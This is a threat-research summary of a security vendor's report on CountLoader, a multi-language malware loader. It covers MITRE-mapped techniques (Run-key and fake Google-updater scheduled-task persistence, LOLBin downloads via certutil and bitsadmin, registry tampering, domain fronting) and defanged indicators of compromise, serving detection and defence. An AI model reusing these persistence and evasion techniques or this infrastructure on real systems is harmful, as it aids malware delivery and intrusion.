Threat Research

CountLoader: Silent Push Discovers New Malware Loader Being Served in 3 Different Versions

Silentpush
CountLoader: Silent Push Discovers New Malware Loader Being Served in 3 Different Versions

Silent Push discovered a new loader named CountLoader delivered in .NET, PowerShell, and JScript variants that fetches and executes secondary payloads (Cobalt Strike, Adaptix C2, PureHVNC, Lumma) and was used in a PDF phishing lure impersonating Ukrainian police. Technical artifacts and Cobalt Strike watermarks link CountLoader activity to ransomware clusters and possible IAB affiliates tied to LockBit, BlackBasta, and Qilin. #CountLoader #CobaltStrike #Adaptix #Lumma #LockBit #BlackBasta #Qilin

Keypoints

  • CountLoader is a multi-language loader (JScript/.hta, .NET, PowerShell) observed delivering Cobalt Strike, Adaptix C2, PureHVNC, and Lumma Stealer.
  • The JScript/.hta variant is the most feature-rich: extensive C2 loop, six download methods, three execution methods, domain-aware fingerprinting, and persistence via scheduled mshta tasks.
  • CountLoader uses a robust C2 authentication/encryption scheme (XOR + Base64) and retrieves task lists (taskType-based) that enable downloading/executing EXEs, DLLs, MSI, and domain queries.
  • Observed staging behavior favors the Windows Music folder for downloaded payloads and includes use of LOLBins (certutil, bitsadmin) and reflective in-memory execution paths.
  • Analysis of embedded Cobalt Strike watermarks (e.g., 1473793097 and 1357776117) and shared infrastructure (domains/IPs, SSL fingerprints) links CountLoader activity to ransomware clusters and likely IAB or affiliate operations tied to LockBit, BlackBasta, and Qilin.
  • Notable C2 domains and infrastructure include app-updater[.]app(s), ms-team-ping[.]com variants, misctoolsupdate[.]com, quasuar[.]com, and IPs such as 45.61.150[.]76 and 180.131.145[.]73.
  • Silent Push recommends integrating IOFA™ feeds (CountLoader domains, Cobalt Strike/Adaptix/Lumma indicators) and initiating deeper investigations on detection due to evolving payloads and threat actor ties.

MITRE Techniques

  • [T1059 ] Command and Scripting Interpreter – CountLoader implements JScript, PowerShell, and .NET variants to execute tasks and download payloads (“…JScript-based version…wrapped in an HTML application…PowerShell version…20 lines…in-memory execution via reflective loading…”).
  • [T1105 ] Ingress Tool Transfer – Downloader functionality uses multiple methods (curl, PowerShell, MSXML2.XMLHTTP, WinHTTP, bitsadmin, certutil) to fetch payloads (“…All tasks that download external software to execute make use of a function that attempts the download via up to six different methods…”).
  • [T1547.001 ] Boot or Logon Autostart Execution: Registry Run Keys – CountLoader sets a Run key to execute mshta pointing to C2 (HKCUSoftwareMicrosoftWindowsCurrentVersionRunOneDriver) (“…The malware then continues its execution by setting the Windows Run Key via…”).
  • [T1053.005 ] Scheduled Task/Job: Scheduled Task – Creates a scheduled task named impersonating Google updater to run mshta and maintain persistence (“…CountLoader creates a scheduled task…GoogleUpdaterTaskSystem135.0.7023.0…runs the ‘mshta’ executable pointing to ‘C2Server/env_Var…ten minutes after the initial execution.’”).
  • [T1071 ] Application Layer Protocol – Uses HTTP(S) API endpoints (/api/getFile, /connect, /api/approveUpdate) with Bearer auth for C2 communications (“…CountLoader connects using the ‘/connect’ endpoint…Authorization Bearer Header…”).
  • [T1036.005 ] Masquerading: Match Legitimate Name or Location – Task/scheduled task names and User-Agent strings impersonate legitimate software/browsers (GoogleUpdaterTask, Yandex UA) to blend in (“…The task name attempts to impersonate Google’s update tasks…hardcoded User-Agent indicating a Yandex browser…”).
  • [T1112 ] Modify Registry – Alters Internet Explorer MaxScriptStatements registry value to suppress MSHTA warnings (“…changes the registry value for ‘MaxScriptStatements’ under ‘HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerStyles’ to ‘10000000’.”).
  • [T1005 ] Data from Local System – Collects hardware and environment identifiers (username, processor ID, system UUID, disk model/serial) to build a Victim ID and GUID used in C2 fingerprinting (“…Generate a Victim ID by ingesting different Hardware ID values…”).
  • [T1496 ] Resource Hijacking/Proxying (domain fronting use) – Use of CloudFront domain fronting and multiple redirector domains to mask C2 infrastructure (“…domain fronting technique via CloudFront…d31tef3bsujkft.cloudfront.net/safebrowsing/…”).

Indicators of Compromise

  • [Domains ] C2 and infrastructure domains associated with CountLoader and payloads – app-updater[.]app, app-updater1[.]app (and app-updater2[.]app).
  • [Domains ] Ransomware/Cobalt Strike related domains – misctoolsupdate[.]com, quasuar[.]com, ms-team-ping2[.]com, grouptelecoms[.]com (and other sample domains listed).
  • [IP Addresses ] Cobalt Strike / infrastructure IPs – 45.61.150[.]76 (quasuar[.]com), 180.131.145[.]73 (misctoolsupdate[.]com) and 64[.]137[.]9[.]118 (payload hosting C2 for Cobalt Strike/Adaptix).”
  • [File Hashes ] Sample binaries and payload hashes – twitter1[.]exe SHA-256: 17bfe335b2f9037849fda87ae0a7909921a96d8abfafa8111dc5da63cbf11eda; Cobalt Strike sample file2[.]exe SHA-256: 233C777937F3B0F83B1F6AE47403E03D1C3F72F650B4C6AE3FACEC7F2E5DA4B5 (and 4 more payload hashes referenced).
  • [Filenames ] Lures and staged filenames – vymoha_na_yavku.zip (PDF lure impersonating Ukrainian police), twitter1[.]exe, svchost[.]exe, file2[.]exe.
  • [URLs/Paths ] API endpoints used by CountLoader – /api/getFile?fn= (used across domains), /connect, /api/approveUpdate?id= (example decrypted endpoint ‘/api/approveUpdate?id=’ and shared ‘/api/getFile?fn=’ pattern).

Read more: https://www.silentpush.com/blog/countloader/?utm_source=rss&utm_medium=rss&utm_campaign=countloader

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint